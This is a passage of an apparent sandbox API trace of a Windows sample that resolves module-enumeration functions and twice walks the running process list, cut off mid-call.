lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x14d2d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0100.298] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x14d2d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0100.298] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.298] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x14d2d0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0100.299] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0100.299] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0100.305] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.306] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0100.307] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0100.308] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.308] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0100.309] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.310] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0100.310] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0100.311] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0100.312] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0100.312] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.313] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.314] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.314] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.315] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.316] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0100.316] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.317] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.318] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0100.319] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.320] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.321] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0100.322] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0100.323] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0100.325] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.326] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.327] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0100.328] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0100.329] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0100.330] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0100.332] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0100.428] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0100.429] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0100.430] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0100.431] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0100.432] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0100.434] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0100.435] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0100.436] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0100.437] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0100.438] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0100.439] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0100.440] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0100.441] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0100.443] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0100.444] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0100.445] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.446] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0100.447] CloseHandle (hObject=0xc4) returned 1 [0100.447] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0100.452] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.453] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0100.454] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0100.454] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.455] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0100.456] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.456] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0100.457] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0100.458] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0100.459] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0100.504] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.505] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.506] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.506] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.507] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.508] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0100.508] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.510] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0100.511] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.513] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0100.515] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0100.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0100.517] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.518] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0100.521] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0100.522] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 